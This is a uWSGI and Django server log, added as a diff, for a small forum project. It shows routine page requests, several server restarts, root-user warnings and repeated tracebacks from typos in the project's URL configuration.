+[pid: 15210|app: -1|req: -1/12] 117.100.100.38 () {38 vars in 1224 bytes} [Fri Jan 8 13:19:45 2021] GET /static/js/bootstrap.js => generated 56264 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15210|app: -1|req: -1/13] 117.100.100.38 () {38 vars in 1242 bytes} [Fri Jan 8 13:19:45 2021] GET /static/js/jquery.prettyPhoto.js => generated 35912 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15210|app: -1|req: -1/14] 117.100.100.38 () {38 vars in 1240 bytes} [Fri Jan 8 13:19:45 2021] GET /static/js/jquery.flexslider.js => generated 40181 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0)
+[pid: 15210|app: -1|req: -1/15] 117.100.100.38 () {38 vars in 1232 bytes} [Fri Jan 8 13:19:46 2021] GET /static/js/jquery.custom.js => generated 3065 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 15210|app: -1|req: -1/16] 117.100.100.38 () {38 vars in 1286 bytes} [Fri Jan 8 13:19:48 2021] GET /static/img/page-bg-1.jpg => generated 1600 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 15210|app: -1|req: -1/17] 117.100.100.38 () {38 vars in 1292 bytes} [Fri Jan 8 13:19:48 2021] GET /static/img/back-top-btn.png => generated 1790 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 15210|app: -1|req: -1/18] 117.100.100.38 () {38 vars in 1260 bytes} [Fri Jan 8 13:19:48 2021] GET /static/img/favicon.ico => generated 1150 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0)
+[pid: 15210|app: 0|req: 7/19] 117.100.100.38 () {40 vars in 1346 bytes} [Fri Jan 8 13:19:52 2021] GET /my-admin => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 0)
+[pid: 15210|app: 0|req: 8/20] 117.100.100.38 () {40 vars in 1348 bytes} [Fri Jan 8 13:19:52 2021] GET /my-admin/ => generated 5294 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 15210|app: 0|req: 9/21] 117.100.100.38 () {40 vars in 1345 bytes} [Fri Jan 8 13:19:57 2021] GET /login/ => generated 6356 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+Fri Jan 8 13:21:59 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+Fri Jan 8 13:21:59 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:25:53 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-13-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /
+detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 7269
+your memory page size is 4096 bytes
+detected max file descriptor number: 1024
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8080 fd 4
+uwsgi socket 0 bound to TCP address 127.0.0.1:37543 (port auto-assigned) fd 3
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)]
+Python main interpreter initialized at 0x1dd89c0
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+ModuleNotFoundError: No module named 'master'
+unable to load app 0 (mountpoint='') (callable not found or import error)
+WSGI app 0 (mountpoint='') ready in 0 seconds on interpreter 0x1dd89c0 pid: 16373 (default app)
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+spawned uWSGI master process (pid: 16373)
+spawned uWSGI worker 1 (pid: 16374, cores: 2)
+spawned uWSGI http 1 (pid: 16375)
+[pid: 16374|app: 0|req: 1/1] 117.100.100.38 () {42 vars in 1374 bytes} [Fri Jan 8 13:25:57 2021] GET /login/ => generated 6416 bytes in 37 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 16374|app: -1|req: -1/2] 117.100.100.38 () {38 vars in 1224 bytes} [Fri Jan 8 13:25:57 2021] GET /static/js/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 1)
+[pid: 16374|app: 0|req: 2/3] 117.100.100.38 () {48 vars in 1438 bytes} [Fri Jan 8 13:26:05 2021] POST /login/ => generated 82 bytes in 7 msecs (HTTP/1.1 200) 5 headers in 165 bytes (1 switches on core 1)
+[pid: 16374|app: 0|req: 3/4] 117.100.100.38 () {48 vars in 1438 bytes} [Fri Jan 8 13:26:10 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0)
+[pid: 16374|app: 0|req: 4/5] 117.100.100.38 () {40 vars in 1382 bytes} [Fri Jan 8 13:26:10 2021] GET /home/ => generated 8157 bytes in 10 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 16374|app: 0|req: 5/6] 117.100.100.38 () {40 vars in 1385 bytes} [Fri Jan 8 13:26:16 2021] GET /publish => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 177 bytes (1 switches on core 0)
+[pid: 16374|app: 0|req: 6/7] 117.100.100.38 () {40 vars in 1387 bytes} [Fri Jan 8 13:26:16 2021] GET /publish/ => generated 4909 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 16374|app: 0|req: 7/8] 117.100.100.38 () {40 vars in 1381 bytes} [Fri Jan 8 13:26:23 2021] GET /login/ => generated 6416 bytes in 1 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 16374|app: 0|req: 8/9] 117.100.100.38 () {48 vars in 1480 bytes} [Fri Jan 8 13:26:26 2021] POST /login/ => generated 27 bytes in 6 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1)
+[pid: 16374|app: 0|req: 9/10] 117.100.100.38 () {40 vars in 1380 bytes} [Fri Jan 8 13:26:26 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 16374|app: 0|req: 10/11] 117.100.100.38 () {42 vars in 1412 bytes} [Fri Jan 8 13:26:30 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 16374|app: 0|req: 11/12] 117.100.100.38 () {42 vars in 1412 bytes} [Fri Jan 8 13:26:30 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 16374|app: 0|req: 12/13] 117.100.100.38 () {42 vars in 1412 bytes} [Fri Jan 8 13:26:30 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 16374|app: 0|req: 13/14] 117.100.100.38 () {42 vars in 1412 bytes} [Fri Jan 8 13:26:30 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 16374|app: 0|req: 14/15] 117.100.100.38 () {42 vars in 1412 bytes} [Fri Jan 8 13:26:31 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 16374|app: 0|req: 15/16] 117.100.100.38 () {38 vars in 1333 bytes} [Fri Jan 8 13:26:35 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 16374|app: 0|req: 16/17] 117.100.100.38 () {40 vars in 1386 bytes} [Fri Jan 8 13:26:38 2021] GET /publish/ => generated 4909 bytes in 3 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1)
+[pid: 16374|app: 0|req: 17/18] 117.100.100.38 () {40 vars in 1386 bytes} [Fri Jan 8 13:26:41 2021] GET /publish/ => generated 4909 bytes in 4 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0)
+[pid: 16374|app: 0|req: 18/19] 117.100.100.38 () {42 vars in 1413 bytes} [Fri Jan 8 13:27:30 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 16374|app: 0|req: 19/20] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:27:32 2021] GET /home/ => generated 7795 bytes in 7 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 16374|app: 0|req: 20/21] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:27:33 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+[pid: 16374|app: 0|req: 21/22] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:27:33 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 0)
+[pid: 16374|app: 0|req: 22/23] 117.100.100.38 () {40 vars in 1365 bytes} [Fri Jan 8 13:27:33 2021] GET /home/ => generated 7795 bytes in 6 msecs (HTTP/1.1 200) 6 headers in 181 bytes (1 switches on core 1)
+Not Found: /
+[pid: 16374|app: 0|req: 23/24] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 13:29:05 2021] GET / => generated 3244 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0)
+Fri Jan 8 13:30:18 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+Fri Jan 8 13:30:18 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:30:19 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-13-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /
+detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 7269
+your memory page size is 4096 bytes
+detected max file descriptor number: 1024
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8080 fd 4
+uwsgi socket 0 bound to TCP address 127.0.0.1:44363 (port auto-assigned) fd 3
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)]
+Python main interpreter initialized at 0x11c79c0
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+ModuleNotFoundError: No module named 'master'
+unable to load app 0 (mountpoint='') (callable not found or import error)
+WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x11c79c0 pid: 17162 (default app)
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+spawned uWSGI master process (pid: 17162)
+spawned uWSGI worker 1 (pid: 17163, cores: 2)
+spawned uWSGI http 1 (pid: 17164)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ re_path(r'^$',views.home)
+NameError: name 're_path' is not defined
+[pid: 17163|app: 0|req: 1/1] 117.100.100.38 () {38 vars in 1324 bytes} [Fri Jan 8 13:30:26 2021] GET / => generated 111698 bytes in 78 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ re_path(r'^$',views.home)
+NameError: name 're_path' is not defined
+[pid: 17163|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:30:29 2021] GET / => generated 111835 bytes in 39 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ re_path(r'^$',views.home)
+NameError: name 're_path' is not defined
+[pid: 17163|app: 0|req: 3/3] 117.100.100.38 () {40 vars in 1355 bytes} [Fri Jan 8 13:30:30 2021] GET / => generated 111835 bytes in 38 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Fri Jan 8 13:30:55 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+Fri Jan 8 13:30:55 2021 - uWSGI worker 1 screams: UAAAAAAH my master disconnected: i will kill myself !!!
+*** Starting uWSGI 2.0.19.1 (64bit) on [Fri Jan 8 21:30:56 2021] ***
+compiled with version: 4.8.5 20150623 (Red Hat 4.8.5-44) on 08 January 2021 13:09:04
+os: Linux-3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020
+nodename: VM-0-13-centos
+machine: x86_64
+clock source: unix
+pcre jit disabled
+detected number of CPU cores: 1
+current working directory: /
+detected binary path: /www/wwwroot/master/master_venv/bin/uwsgi
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+chdir() to /www/wwwroot/master
+your processes number limit is 7269
+your memory page size is 4096 bytes
+detected max file descriptor number: 1024
+!!! no /etc/mime.types file found !!!
+lock engine: pthread robust mutexes
+thunder lock: disabled (you can enable it with --thunder-lock)
+uWSGI http bound on 0.0.0.0:8080 fd 4
+uwsgi socket 0 bound to TCP address 127.0.0.1:42802 (port auto-assigned) fd 3
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+Python version: 3.7.8 (default, Jul 6 2020, 09:48:19) [GCC 4.8.5 20150623 (Red Hat 4.8.5-39)]
+Python main interpreter initialized at 0x277e9c0
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+python threads support enabled
+your server socket listen backlog is limited to 100 connections
+your mercy for graceful operations on workers is 60 seconds
+mapped 166752 bytes (162 KB) for 2 cores
+*** Operational MODE: threaded ***
+ModuleNotFoundError: No module named 'master'
+unable to load app 0 (mountpoint='') (callable not found or import error)
+WSGI app 0 (mountpoint='') ready in 1 seconds on interpreter 0x277e9c0 pid: 17337 (default app)
+uWSGI running as root, you can use --uid/--gid/--chroot options
+*** WARNING: you are running uWSGI as root !!! (use the --uid flag) ***
+*** uWSGI is running in multiple interpreter mode ***
+spawned uWSGI master process (pid: 17337)
+spawned uWSGI worker 1 (pid: 17338, cores: 2)
+spawned uWSGI http 1 (pid: 17340)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ ulr(r'^$',views.home),
+NameError: name 'ulr' is not defined
+[pid: 17338|app: 0|req: 1/1] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:00 2021] GET / => generated 111812 bytes in 79 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ ulr(r'^$',views.home),
+NameError: name 'ulr' is not defined
+[pid: 17338|app: 0|req: 2/2] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:02 2021] GET / => generated 111812 bytes in 39 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ ulr(r'^$',views.home),
+NameError: name 'ulr' is not defined
+[pid: 17338|app: 0|req: 3/3] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:03 2021] GET / => generated 111812 bytes in 38 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
+ resolver_match = resolver.resolve(request.path_info)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 545, in resolve
+ for pattern in self.url_patterns:
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 589, in url_patterns
+ patterns = getattr(self.urlconf_module, "urlpatterns", self.urlconf_module)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/utils/functional.py", line 48, in __get__
+ res = instance.__dict__[self.name] = self.func(instance)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/urls/resolvers.py", line 582, in urlconf_module
+ return import_module(self.urlconf_name)
+ File "/www/server/panel/pyenv/lib/python3.7/importlib/__init__.py", line 127, in import_module
+ return _bootstrap._gcd_import(name[level:], package, level)
+ File "", line 1006, in _gcd_import
+ File "", line 983, in _find_and_load
+ File "", line 967, in _find_and_load_unlocked
+ File "", line 677, in _load_unlocked
+ File "", line 728, in exec_module
+ File "", line 219, in _call_with_frames_removed
+ File "./ForumSystem/urls.py", line 35, in
+ ulr(r'^$',views.home),
+NameError: name 'ulr' is not defined
+[pid: 17338|app: 0|req: 4/4] 117.100.100.38 () {40 vars in 1354 bytes} [Fri Jan 8 13:31:04 2021] GET / => generated 111812 bytes in 37 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1)
+Internal Server Error: /
+Traceback (most recent call last):
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/exception.py", line 47, in inner
+ response = get_response(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 167, in _get_response
+ callback, callback_args, callback_kwargs = self.resolve_request(request)
+ File "/www/wwwroot/master/master_venv/lib/python3.7/site-packages/django/core/handlers/base.py", line 290, in resolve_request
